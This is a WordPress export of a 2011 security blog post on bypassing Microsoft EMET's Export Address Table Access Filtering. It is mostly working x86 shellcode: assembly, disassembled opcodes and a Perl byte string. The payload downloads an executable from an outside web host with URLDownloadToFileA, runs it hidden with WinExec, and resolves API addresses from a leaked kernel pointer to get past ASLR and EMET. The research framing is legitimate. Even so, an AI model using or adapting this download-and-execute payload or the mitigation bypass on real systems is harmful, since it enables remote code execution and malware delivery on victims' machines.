{"id":483,"date":"2011-12-19T15:26:00","date_gmt":"2011-12-19T14:26:00","guid":{"rendered":"http:\/\/www.greyhathacker.net\/?p=483"},"modified":"2013-03-21T21:15:33","modified_gmt":"2013-03-21T20:15:33","slug":"bypassing-emets-eaf-with-custom-shellcode-using-kernel-pointer","status":"publish","type":"post","link":"https:\/\/www.greyhathacker.net\/?p=483","title":{"rendered":"Bypassing EMET&#8217;s EAF with custom shellcode using kernel pointer"},"content":{"rendered":"<p>Recently I have been testing out Microsoft&#8217;s &#8220;Enhanced Mitigation Experience Toolkit&#8221; (EMET), a tool for exploit mitigation. It is free and is designed to harden or secure applications without having to recode them. One exploit I used to test it was Adobe Flash&#8217;s &#8220;ActionScript type confusion&#8221; vulnerability (CVE-2010-3654), which affects version 10.1.53.64 and below. I used the exploit downloaded from www.abysssec.com. This exploit worked perfectly on a fully patched Windows 7 with hardware DEP set to OptOut, running Internet Explorer 8 with Adobe Flash version 10.1.53.64.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" alt=\"\" src=\"\/images\/emet.png\" width=\"408\" height=\"540\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" alt=\"\" src=\"\/images\/emetconfig.png\" width=\"529\" height=\"257\" \/><\/p>\n<p>After enabling EMET on the Internet Explorer executable iexplore.exe and testing again, the exploit broke. With the mitigation feature &#8220;Export Address Table Access Filtering&#8221; (EAF) disabled on the process, the exploit succeeded again, proving that EMET&#8217;s EAF was what stopped the shellcode from executing.<\/p>\n<p>EMET&#8217;s user guide states:<\/p>\n<blockquote><p>In order to do something &#8220;useful&#8221;, shellcode generally needs to call Windows APIs. 
However, in order to call an API, shellcode must first find the address where that API has been loaded. To do this the vast majority of shellcode iterates through the export address table of all loaded modules, looking for modules that contain useful APIs. Typically this involves kernel32.dll or ntdll.dll. Once an interesting module has been found, the shellcode can then figure out the address where an API in that module resides. This mitigation filters accesses to the Export Address Table (EAT), allowing or disallowing the read\/write access based on the calling code. With EMET in place, most of today\u2019s shellcode will be blocked when it tries to look up the APIs needed for its payload.<\/p><\/blockquote>\n<p>I see EMET&#8217;s EAF as a great feature: even on a system that supports DEP and ASLR, EAF is another hurdle to get round before an exploit succeeds. Berend-Jan Wever wrote an article last year showing how to bypass EAF, but I thought I&#8217;d write my own custom shellcode to bypass it. For this example I&#8217;ll use the RemoteExec exploit published in my last post. As soon as I protected RemoteExec.exe with EMET my existing exploit broke, so my new shellcode now calls the required APIs directly, without walking any export table for EAF to filter.<\/p>\n<p>Below is my custom asm code, which downloads and executes box.exe. I started with static addresses. 
The addresses used in this asm code are from a Windows XP SP3 machine.<\/p>\n<p>To assemble our code we run<\/p>\n<pre>&gt;nasmw -f bin -o urldownexe.bin urldownexe.asm<\/pre>\n<pre>[BITS 32]\r\n;\r\nPUSH 0x00206c6c\r\nPUSH 0x642e6e6f\r\nPUSH 0x6d6c7275\r\nMOV EBX,ESP\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; save pointer \"urlmon.dll\" in EBX\r\nPUSH EBX\r\nMOV EAX,0x7C801D7B\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\nCALL EAX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; LoadLibraryA\r\n;\r\nPUSH 0x00657865\r\nPUSH 0x2e786f62\r\nMOV EBX,ESP\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; save pointer \"box.exe\" in EBX\r\n;\r\nPUSH 0x00206578\r\nPUSH 0x652e786f\r\nPUSH 0x62737365\r\nPUSH 0x6d2f736c\r\nPUSH 0x6f6f742f\r\nPUSH 0x74656e2e\r\nPUSH 0x72656b63\r\nPUSH 0x61687461\r\nPUSH 0x68796572\r\nPUSH 0x672e7777\r\nPUSH 0x772f2f3a\r\nPUSH 0x70747468\r\nMOV ECX,ESP\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; save pointer to in ECX\r\n;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; http:\/\/www.greyhathacker.net\/tools\/messbox.exe\r\nXOR EDX,EDX\r\nPUSH EDX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; put parameters on the stack\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\nPUSH EDX\r\nPUSH EBX\r\nPUSH ECX\r\nPUSH EDX\r\n;\r\nMOV EAX,0x781C4868\r\nCALL EAX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; URLDownloadToFileA\r\n;\r\nPUSH 0x00657865\r\nPUSH 0x2e786f62\r\nMOV\u00a0 EAX,ESP\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; save pointer \"box.exe\" in EAX\r\nXOR EBX,EBX\r\nPUSH EBX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\nPUSH EAX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\nMOV EAX,0x7c86250d\u00a0 ; WinExec\r\nCALL EAX\r\n;\r\nXOR 
EAX,EAX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\nPUSH EAX\r\nMOV EAX,0x7c81CB12\r\nCALL EAX\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; ExitProcess<\/pre>\n<p>To get our opcodes we run<\/p>\n<pre>&gt;ndisasmw urldownexe.bin -b 32<\/pre>\n<pre>00000000\u00a0 686C6C2000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x206c6c\r\n00000005\u00a0 686F6E2E64\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x642e6e6f\r\n0000000A\u00a0 6875726C6D\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x6d6c7275\r\n0000000F\u00a0 89E3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov ebx,esp\r\n00000011\u00a0 53\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push ebx\r\n00000012\u00a0 B87B1D807C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,0x7c801d7b\r\n00000017\u00a0 FFD0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call eax\r\n00000019\u00a0 6865786500\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x657865\r\n0000001E\u00a0 68626F782E\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x2e786f62\r\n00000023\u00a0 89E3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov ebx,esp\r\n00000025\u00a0 6878652000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x206578\r\n0000002A\u00a0 686F782E65\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x652e786f\r\n0000002F\u00a0 6865737362\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x62737365\r\n00000034\u00a0 686C732F6D\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x6d2f736c\r\n00000039\u00a0 682F746F6F\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x6f6f742f\r\n0000003E\u00a0 682E6E6574\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x74656e2e\r\n00000043\u00a0 68636B6572\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x72656b63\r\n00000048\u00a0 
6861746861\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x61687461\r\n0000004D\u00a0 6872657968\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x68796572\r\n00000052\u00a0 6877772E67\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x672e7777\r\n00000057\u00a0 683A2F2F77\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x772f2f3a\r\n0000005C\u00a0 6868747470\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x70747468\r\n00000061\u00a0 89E1\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov ecx,esp\r\n00000063\u00a0 31D2\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 xor edx,edx\r\n00000065\u00a0 52\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push edx\r\n00000066\u00a0 52\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push edx\r\n00000067\u00a0 53\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push ebx\r\n00000068\u00a0 51\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push ecx\r\n00000069\u00a0 52\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push edx\r\n0000006A\u00a0 B868481C78\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,0x781c4868\r\n0000006F\u00a0 FFD0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call eax\r\n00000071\u00a0 6865786500\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x657865\r\n00000076\u00a0 68626F782E\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push dword 0x2e786f62\r\n0000007B\u00a0 89E0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,esp\r\n0000007D\u00a0 31DB\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 xor ebx,ebx\r\n0000007F\u00a0 53\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push 
ebx\r\n00000080\u00a0 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push eax\r\n00000081\u00a0 B80D25867C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,0x7c86250d\r\n00000086\u00a0 FFD0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call eax\r\n00000088\u00a0 31C0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 xor eax,eax\r\n0000008A\u00a0 50\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 push eax\r\n0000008B\u00a0 B812CB817C\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 mov eax,0x7c81cb12\r\n00000090\u00a0 FFD0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 call eax<\/pre>\n<p>Finally, to test our shellcode we can use Berend&#8217;s testival.exe tool:<\/p>\n<pre>&gt;w32-testival [$]=ascii:urldownexe.bin eip=$ --verbose --eh --eh<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" alt=\"\" src=\"\/images\/pwned.png\" width=\"260\" height=\"100\" \/><\/p>\n<p>Now that we know our code works, the next step was to make sure the addresses were generated dynamically, since hardcoded addresses would not work on Windows 7 because of ASLR (the addresses change at the next boot), and I also had to avoid the bad characters for this exploit. Even though writing custom shellcode takes a bit of time, after writing a ROP exploit it seemed relatively easy \ud83d\ude42<\/p>\n<p>Below is my completed shellcode, which can be used on RemoteExec for Windows 7 with EMET enabled on the process. The key to this exploit was that we had already obtained our kernel pointer in our last exploit, from which we worked out the VirtualProtect API address and stored it in ESI. 
With this in mind I used the value of ESI and calculated our API addresses, LoadLibrary, URLDownloadToFileA, WinExec, etc.<\/p>\n<pre>my $shellcode =\r\n#\r\n# LoadLibraryA(\"urlmon.dll\");\r\n#\r\n\"\\x68\\x6c\\x6c\\x00\\x00\".\u00a0\u00a0\u00a0 # push dword 0x206c6c\u00a0\u00a0# badchar 0x20 -&gt; 0x00\r\n\"\\x68\\x6f\\x6e\\x2e\\x64\".\u00a0\u00a0\u00a0 # push dword 0x642e6e6f\r\n\"\\x68\\x75\\x72\\x6c\\x6d\".\u00a0\u00a0\u00a0 # push dword 0x6d6c7275\r\n\"\\x89\\xE3\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov ebx,esp\r\n\"\\x53\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ebx\r\n\"\\x89\\xF0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov eax,esi\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# esi = VirtualProtect\r\n\"\\x05\\x98\\xb0\\x00\\x00\".\u00a0\u00a0\u00a0 # add eax,0xB098\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# eax = LoadLibrary\r\n\"\\xFF\\xD0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # call eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# LoadLibrary\r\n#\r\n# box.exe - place in current folder\r\n#\r\n\"\\x68\\x65\\x78\\x65\\x00\".\u00a0\u00a0\u00a0 # push dword 0x00657865\r\n\"\\x68\\x62\\x6f\\x78\\x2e\".\u00a0\u00a0\u00a0 # push dword 0x2e786f62\r\n\"\\x89\\xE3\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov ebx,esp\r\n#\r\n# http:\/\/www.greyhathacker.net\/tools\/messbox.exe\r\n#\r\n\"\\x68\\x78\\x65\\x00\\x00\".\u00a0\u00a0\u00a0 # push dword 0x206578\u00a0\u00a0# badchar 0x20 -&gt; 0x00\r\n\"\\x68\\x6F\\x78\\x2E\\x65\".\u00a0\u00a0\u00a0 # push dword 0x652e786f\r\n\"\\x68\\x65\\x73\\x73\\x62\".\u00a0\u00a0\u00a0 # push dword 0x62737365\r\n\"\\x68\\x6C\\x73\\x2F\\x6D\".\u00a0\u00a0\u00a0 # push dword 
0x6d2f736c\r\n\"\\x68\\x2F\\x74\\x6F\\x6F\".\u00a0\u00a0\u00a0 # push dword 0x6f6f742f\r\n\"\\x68\\x2E\\x6E\\x65\\x74\".\u00a0\u00a0\u00a0 # push dword 0x74656e2e\r\n\"\\x68\\x63\\x6B\\x65\\x72\".\u00a0\u00a0\u00a0 # push dword 0x72656b63\r\n\"\\x68\\x61\\x74\\x68\\x61\".\u00a0\u00a0\u00a0 # push dword 0x61687461\r\n\"\\x68\\x72\\x65\\x79\\x68\".\u00a0\u00a0\u00a0 # push dword 0x68796572\r\n\"\\x68\\x77\\x77\\x2E\\x67\".\u00a0\u00a0\u00a0 # push dword 0x672e7777\r\n\"\\x68\\x3A\\x2F\\x2F\\x77\".\u00a0\u00a0\u00a0 # push dword 0x772f2f3a\r\n\"\\x68\\x68\\x74\\x74\\x70\".\u00a0\u00a0\u00a0 # push dword 0x70747468\r\n\"\\x89\\xE1\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov ecx,esp\r\n#\r\n\"\\x31\\xD2\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # xor edx,edx\r\n\"\\x52\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push edx\u00a0 - Arg5\r\n\"\\x52\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push edx\u00a0 - Arg4\r\n\"\\x53\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ebx\u00a0 - Arg3\r\n\"\\x51\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ecx\u00a0 - Arg2\r\n\"\\x52\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push edx\u00a0 - Arg1\r\n#\r\n# URLDownloadToFileA(\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 NULL,\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \"http:\/\/www.greyhathacker.net\/tools\/messbox.exe\",\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 
\"box.exe\",\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 0,\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 NULL);\r\n#\r\n# At this point eax contains base address of urlmon.dll 0x75bf0000\r\n# Adding 0x96DC8 becomes pointer to URLDownloadToFileA address\r\n#\r\n\"\\x05\\xc8\\x6d\\x08\\x00\".\u00a0\u00a0\u00a0 # add eax,0x86DC8\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# remove bad char 0x09\r\n\"\\x05\\x00\\x00\\x01\\x00\".\u00a0\u00a0\u00a0 # add eax,0x10000\u00a0\u00a0# eax = URLDownloadToFileA\r\n\"\\xFF\\xD0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # call eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # URLDownloadToFileA\r\n#\r\n# WinExec(\"box.exe\", 0);\r\n#\r\n\"\\x68\\x65\\x78\\x65\\x00\".\u00a0\u00a0\u00a0 # push dword 0x00657865\r\n\"\\x68\\x62\\x6f\\x78\\x2e\".\u00a0\u00a0\u00a0 # push dword 0x2e786f62\r\n\"\\x8B\\xC4\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov\u00a0 eax,esp\r\n\"\\x31\\xDB\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # xor ebx,ebx\r\n\"\\x53\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push ebx\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # ShowState = SW_HIDE\r\n\"\\x50\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # CmdLine = box.exe\r\n\"\\x89\\xF0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov eax,esi\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # esi = VirtualProtect\r\n\"\\x05\\xe5\\xc1\\x04\\x00\".\u00a0\u00a0\u00a0 # add eax,0x4C1E5\u00a0\u00a0\u00a0\u00a0\u00a0 # eax = 
WinExec\r\n\"\\xFF\\xD0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # call eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# WinExec\r\n#\r\n# ExitProcess(0);\r\n#\r\n\"\\x31\\xC0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # xor eax,eax\r\n\"\\x50\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # push eax\r\n\"\\x89\\xF0\".\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # mov eax,esi\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# esi = VirtualProtect\r\n\"\\x05\\x15\\x90\\x01\\x00\".\u00a0\u00a0\u00a0 # add eax,0x19015\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# eax = ExitProcess\r\n\"\\xFF\\xD0\";\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # call eax\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0# ExitProcess<\/pre>\n<p>Peter Van Eeckhoutte&#8217;s &#8220;Exploit writing tutorial part 9 : Introduction to Win32 shellcoding&#8221; contains a cool Perl script written by Peter that does all the hard work of converting our ASCII string into push instructions in reverse order. Brilliant \ud83d\ude42<\/p>\n<p>EMET is a superb tool to have installed and I would recommend it to anyone, as it will mitigate a number of shellcode-based exploits. One thing I would like to see in EMET is the ability to alert the user, or some sort of logging, to tell us when shellcode was encountered. 
This would help discover 0-day exploits in the wild if we were inadvertently hit by a drive-by attack.<\/p>\n<p>References:<\/p>\n<p><a href=\"http:\/\/blogs.technet.com\/b\/srd\/archive\/tags\/emet\/\" target=\"_blank\">http:\/\/blogs.technet.com\/b\/srd\/archive\/tags\/emet\/<\/a><br \/>\n<a href=\"http:\/\/skypher.com\/index.php\/2010\/11\/17\/bypassing-eaf\/\" target=\"_blank\">http:\/\/skypher.com\/index.php\/2010\/11\/17\/bypassing-eaf\/<\/a><br \/>\n<a href=\"http:\/\/www.adobe.com\/support\/security\/advisories\/apsa10-05.html\" target=\"_blank\">http:\/\/www.adobe.com\/support\/security\/advisories\/apsa10-05.html<\/a><br \/>\n<a href=\"http:\/\/www.abysssec.com\/blog\/2011\/04\/18\/exploiting-adobe-flash-player-on-windows-7\/\" target=\"_blank\">http:\/\/www.abysssec.com\/blog\/2011\/04\/18\/exploiting-adobe-flash-player-on-windows-7\/<\/a><br \/>\n<a href=\"http:\/\/www.corelan.be\/index.php\/2010\/02\/25\/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding\/\" target=\"_blank\">http:\/\/www.corelan.be\/index.php\/2010\/02\/25\/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Recently I have been testing out Microsoft&#8217;s &#8220;Enhanced Mitigation Experience Toolkit&#8221; (EMET) tool for exploit mitigation. This is a free tool and is designed to harden or secure applications without having to recode them. One exploit I used to test was Adobe Flash&#8217;s &#8220;Action script type confusion&#8221; vulnerability (CVE-2010-3654). 
This vulnerability affects version 10.1.53.64 and [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[18,7,6],"tags":[33,31],"class_list":["post-483","post","type-post","status-publish","format-standard","hentry","category-all","category-exploits","category-vulnerabilities","tag-emet","tag-remoteexec"],"_links":{"self":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=483"}],"version-history":[{"count":16,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/483\/revisions"}],"predecessor-version":[{"id":695,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=\/wp\/v2\/posts\/483\/revisions\/695"}],"wp:attachment":[{"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=483"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.greyhathacker.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}